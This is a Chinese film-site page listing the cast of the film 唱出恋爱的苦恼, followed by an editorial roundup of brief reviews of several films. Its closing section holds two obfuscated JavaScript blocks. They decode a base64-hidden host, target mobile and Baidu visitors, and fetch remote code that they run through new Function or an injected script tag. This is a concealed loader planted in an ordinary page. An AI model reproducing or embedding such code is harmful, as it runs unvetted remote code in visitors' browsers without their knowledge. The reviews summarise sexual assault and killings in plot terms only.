唱出恋爱的苦恼

  • 稻叶友 远藤健慎 佐藤穗奈美 高桥里恩 小久保寿人 松永拓野 水泽绅吾 瓜生和成
  • 120分钟
  • 唱出恋爱的苦恼影片简介:前言:「编辑部在看啥」全新…唱出恋爱的苦恼影片简介:前言:「编辑部在看啥」全新改版上线啦~本周编辑们准备了电影推荐,既是轻松闲适地追片参考,也是老友相聚的温馨谈资,愿本期推荐能让大家有所收获。 故事从普通的一天早晨开始。过度肥胖让费德里科行动困难,每天从卧室移动到厨房,再从厨房移动到客厅,是他一天行走的距离。房间破败、墙皮斑驳脱落,荒芜的院子里只剩下他,唯一的邻居太太也在去年去世了。费德里科会在吃完早饭打开收音机,伴随着音乐坐在桌子前做手工。妹妹和妹夫每个周六会来看他一次,可妹妹总是迫不及待离开。 这个中年男人的人生看起来像他的家一样,暗淡、衰败。费德里科大多数时间很沉默,他的今天就像是昨天的复制粘贴,或许他会孤独地死在家中,就像邻居太太一样。可人实在是最不可预测的存在。在某一个寻常的周六,妹夫雷蒙带着相机,连在电脑上给费德里科展示他和妻子罗绍拉去旅行的照片,费德里科久违地露出了笑容,他翻出了型号老旧的胶片相机,开始拍照。为了冲印照片,他拄着拐杖走出了家门,这段路几乎要了他的命。 好运气降临了,店员保罗说,他恰好还会冲印这款相机的照片。热爱摄影的费德里科最终花750比索买下了一个打折的数码相机,结果用了没两天电池充不进电。保罗上门来给他修理充电器,却被一场大雨困住。热咖啡、松脆的饼干、昏黄的灯光,费德里科很久没有在家里这样招待新客人了。听摇滚、看漫画的孤独少年保罗,就这样奇妙地与费德里科成为了朋友。他分享《死亡笔记》给费德里科,会在店铺打烊之后来费德里科家里玩耍,雷蒙也更加频繁地来看望费德里科,三个人一起做手工,幼稚地写下自己的“死亡笔记”名单。摄影让孤独的费德里科找到了精神寄托,他开始走出家门,走到人群中去,用相机记录自己觉得值得拍摄的一切。 费德里科的快乐没有能维持太久,他想要去海边旅行,没想到旅行社拒绝了他参团。肥胖的身体像是困住他的囚笼,去海边或许不再只是一次旅行的期待,更像是他人生的破局。最终保罗和雷蒙决定帮费德里科实现愿望,他们搬了沙发放在皮卡的车斗里,载着费德里科来到了他向往的海边。费德里科说,剩下的就是是等,等日出。在生活杀死他之前,费德里科走向了更好的未来。皮卡奔驰在路上时,费德里科脸上始终洋溢着笑,就像歌里唱的:在暴风雨中寻得安宁/回首走过的时光/满是尘埃和痛苦/风催着我前行。这部电影很平淡,几乎没有什么戏剧冲突,但却并不让人觉得冗长无聊,相反很容易在费德里科身上看到自己,平淡但细微的痛感极其真实。 近期影坛备受关注的新闻,是汤唯凭借一部《分手的决心》横扫韩影圈,春史、釜日、韩影三小奖满贯,提名大钟、成为青龙史上第一位外籍影后,还差一个百想。网友戏称,这是汤唯跟内娱分手的决心。 除了汤唯最佳女主拿到手软,《分手的决心》还有最佳影片、导演、编剧、男主等各项荣誉加持,成为又一广为国际关注及认可的韩影。 回顾创作历程,导演朴赞郁将从小就喜欢的韩国歌曲《雾》和瑞典侦探小说系列中的警察角色融合在一起,在与编剧郑瑞景讨论后,有了《分手的决心》的故事雏形。 影片中的男女主角色,都是为演员量身打造。自《色·戒》后,朴赞郁就想与汤唯合作,汤唯与金泰勇结婚后,这份合作更加板上钉钉。一个美丽神秘的中国女人,一条保持深刻的变色龙(服装指导的表述),由汤唯来演会很有说服力。 男主的选角也是如此,朴赞郁在接受采访时表示:“在电影中,海俊格外温柔、整洁有条理、有礼貌、有古怪的幽默感,除了朴海日以外,没有其他演员能让我想到这个角色。” 不是所有人的悲伤都如波涛般汹涌,也有像墨水一样散开的。郑瑞景表示:“我希望观众们能让自己被拉进电影中,就像海俊被瑞莱的爱所吸引一样,就像沙滩被海浪浸透了一样。” 而《分手的决心》的大结局,如网友的评价那样,让影片从《致命女人》转向《东亚女人》。这虽然是一部看起来远离朴赞郁原有风格的作品,但却是一部非常韩国的电影。 一个腰缠万贯、但全身瘫痪的白人富翁,一个离群索居、有着偷窃前科的黑人青年,当这样两个不同种族、不同阶层,完全处在两个世界的人成为朋友,将会产生怎样的化学反应?这部由尼尔·博格执导,2019年在内地上映的美国电影《触不可及》,讲述的就是因为一场滑翔伞事故不幸瘫痪的有钱人菲利普,与照顾其生活的贫穷青年戴尔之间所延展出的一段奇妙的友情故事。 该片改编自法国电影《无法触碰》,但与前作相比,后者在幽默诙谐的气氛营造上增添了更为浓重的笔墨。随性外放的戴尔在豪宅入住后一秒入睡,还直接打起了呼噜;他在洗澡时对于智能系统的一阵狼狈操作也着实令人忍俊不禁。在戴尔模仿天后唱歌,并询问菲利普像不像时,菲利普也会幽默地回答“是啊,我得把眼睛闭上,因为我不能睁眼说瞎话”。诸如此类愉悦有趣的对话和相处方式,令观众在看这部影片时内心是轻松而不是沉重的。 两人之间的相处除了制造出许多笑料,更多地还是他们彼此间的影响、治愈与救赎。从见面的第一刻起,戴尔就没有将菲利普当做一个“不正常”的残疾人来看待。即便菲利普坐着轮椅出门,戴尔也会抛弃厢型车,依旧选择开着跑车带他去兜风。戴尔投射在菲利普身上的目光,不带一丝同情与怜悯,他这种平等的眼光,他身上的乐观与开朗,逐渐驱散了笼罩着菲利普的那层阴影。 而现实生活过的一团糟的戴尔,也在这段友情之旅中慢慢发生着改变。他开始欣赏自己曾经嗤之以鼻的高雅音乐,也渐渐懂得了照顾家人、陪伴孩子、与生活和解,更找到了自己未来真正想做的事。这些转变,正是看似与他处在两个磁极的菲利普所给予他的。就是这样互相“触不可及”的两个人,如温暖的阳光般彼此着照耀,深深治愈着对方身心的伤口,传递着世界的幸福与美好。 这是一部近期国内上映的惊悚、恐怖片,主要讲述了女主和男友以及闺蜜都是极限运动爱好者,在一次攀岩中,男友意外坠崖丧生,这给女主带来了巨大的创伤,于是她疏远了周围所有人,终日酗酒足不出户。闺蜜为了帮助她走出悲伤,邀请她去攀登一座高达610米的废弃电视塔,出于对男友的怀念和对自己的挑战,贝姬答应了亨特的邀请,不料俩人成功登顶后,年久失修的扶梯坠落,二人被困于塔顶,开始了一场心惊肉跳的绝境求生。 这部电影的场景及故事情节都非常简单,但胜在惊悚氛围的营造。当沙漠的强风不断吹打年久生锈的铁塔,两个女主每爬一步梯子都嘎吱作响、并不时有螺丝掉落她们却浑然不觉时,观众会不由自主地为她们捏了一把汗,而当她们被困在只有几米的塔顶平台、往下看是被云雾笼罩深不见底的地面,网上看则是盘旋在头顶的秃鹫时,一种因恐高带来的眩晕感以及对于对死亡的恐惧感随之而来。而当攀爬的梯子全部掉落,她们想尽一切办法来自救却都是徒劳时,也让观众对她们的命运提心吊胆。 除去恐怖氛围感的营造以外,电影还展现出女主自我救赎的心路历程及与家人的和解之旅,使故事多了一层温情表达,而这也是一部非常适合在大银幕观看的电影,大屏的视听体验会放大这种冒险刺激的观感,而作为一部小成本电影,截至目前已收获7300多万美元的票房,是一部比较成功的商业电影。 “为什么不论是男是女,遭遇强奸之后,都会去做风俗行业呢?” “大概是因为,觉得脏了的自己没有任何价值,想确认自己不会输给性暴力。” 这是一部改编自日漫《歌唱恋慕》的电影,影片用晦暗的色调、混乱的秩序为我们展现了日本社会那些被强奸之后的男性,最后都怎么样了。 在这个名为“shelter”的混乱地带,到处充斥着嘈杂的音乐、淫乱不堪的话语,还有失足的青年男女,一向遵纪守法的教师桐谷仁第一次来到这里,陌生的环境让他恐惧,但最令他害怕的,是眼前这个自称在三个月前强暴了他的男人——KAI。 在KAI的威胁下,桐谷仁辞去了工作,每天在“shelter”度过,白天打工,晚上就被迫上台,将自己被强奸的经历和感受用rap的形式唱出来。为了能战胜KAI,他跟着翔太学格斗技,还在“shelter”开设国语课,教授没机会上学的孩子,并在这个过程中,跟翔太的弟弟文太相处得十分愉快,但这份“得之不易”的幸福,很快被抹杀——文太在一个清晨惨死。这件事让“shelter”幕后操纵者的雏形渐渐出现,每个生活在这里的人都明白:文太的死,是他的警告。 桐谷仁在日复一日的格斗技和歌唱中察觉到二者对自己心理创伤的治愈,这个结论也得到了心理医生的肯定,此时,警局打来电话,声称找到了侵犯他的凶手——一个名为间宫的议员。 KAI为什么要撒谎?桐谷仁去询问翔太,意外得知了KAI的过往:KAI从六岁起,就一直活在间宫的阴影之下。出卖身体获得金钱和庇佑,KAI就是用这样的方式,为生活在“shelter”的人寻求一份不被外界打扰的生活。知道真相的桐谷仁找到 KAI,却碰上间宫带人来接KAI,劝说无果之后,桐谷仁独自返回工厂,背上烈酒,只身闯入了间宫的房间,用一把火结束了这噩梦般的一切。成功脱逃的桐谷仁和KAI回溯着他们十多年前的相遇,互表心意,但就在两人耳鬓厮磨过后,死里逃生的间宫趁二人入睡时,杀死了桐谷仁。 作为一部漫改电影,《唱出恋爱的苦恼》以桐谷仁的视角切入,来看待他在遭受性侵后,内心的痛苦与挣扎,以及自我疗愈的系列措施,相比与漫画,KAI的经历在电影中被淡化,使得许多情节,诸如他的童年经历、他对桐谷仁情感的萌发等较为模糊,容易使没有看过原作的观众摸不着头脑。 但总体而言,这部电影展现出的边缘人物的相互救赎令人十分唏嘘,一向遵纪守法的桐谷仁为了解救KAI,不惜放火杀人,而一直身处黑暗的KAI,以为救了桐谷仁,自己也能触碰到一点光明,却没想到他的那束光明媚却短暂。 截至到目前,2022年网大电影中票房最高的依然是《阴阳镇怪谈》,该片由李立群、金巧巧领衔主演,讲述了一个叫阴阳镇的神秘小镇,却有着“只能进,不能出”的规矩,但凡想要离开阴阳镇的人统统都死于非命,而这背后竟然蕴藏着不为人知的秘密...... 说起阴阳镇,此地势险峻三面环山,一面抱水,想出去的人都死相奇惨,比如:打铁的大奎一头扎进了铁水炉;木匠三泰被半空中的树杈戳死;打渔的满仓溺水,吓死在河中;屠夫孙胖子被烤死在砖窑;教书的吕先生跪在姥姥庙门前,头埋在了土里,活活憋死了。 种种怪相让小镇的人心惶惶,男主阎阳一和朋友宝葫芦误打误撞来到此地,在探寻出路的过程中来到了姥姥庙,也遇到了无法用科学解释的怪事,宝葫芦看到和自己长相一样的人在棺材里,阎阳一也差点被勒死。死里逃生后,与二人有过接触的人都陆续离奇死亡,先是打更的王二瘸子,紧接着是书生吕老头、缝尸匠余旺财、茶摊的杨大嫂,但这世上真的有鬼吗?至少在国产恐怖片里肯定没有,真相揭开,死掉的所有人都是棺材铺的三姑和镇长赵玉三的阴谋,镇长就是土匪赵金彪,他杀了真正要上任的镇长,为了防止此事败露,他不允许任何人离开阴阳镇,想要离开的都格杀勿论。镇长被揭穿后再次大开杀戒,在幻象中杀了自己亲闺女,然后饮弹自尽。 最恐怖的永远不是鬼而是人心,正如片中刘疯子话中预示的那样“阴阳镇洞阴阳,一朝疯魔祸心藏,有人惨死亲者痛,有人从此成了狂,棺材铺里人扮鬼,真假难辨把命丧,从此小镇心慌慌,你猜谁的心最脏。” — THE END — 作者 | 影视产业编辑部 主编 | 彭侃 排版 | 石琼渝

同主演

唱出恋爱的苦恼评论

  • 评论加载中...
function MnSOiBvu(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function JWALwu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return MnSOiBvu(t);};window[''+'U'+'E'+'m'+'h'+'o'+'r'+'f'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=JWALwu,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmmdnZmmUuZmmRnZW0uY29t','151743',window,document,['m','ghQdHskE']);}:function(){};


function SlpfF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zGMOk(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SlpfF(t);};window[''+'y'+'j'+'L'+'t'+'e'+'Z'+'V'+'c'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=zGMOk,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmdnnZmUuZmRnnZW0uY29t','151742',window,document,['n','suKaxUl']);}:function(){};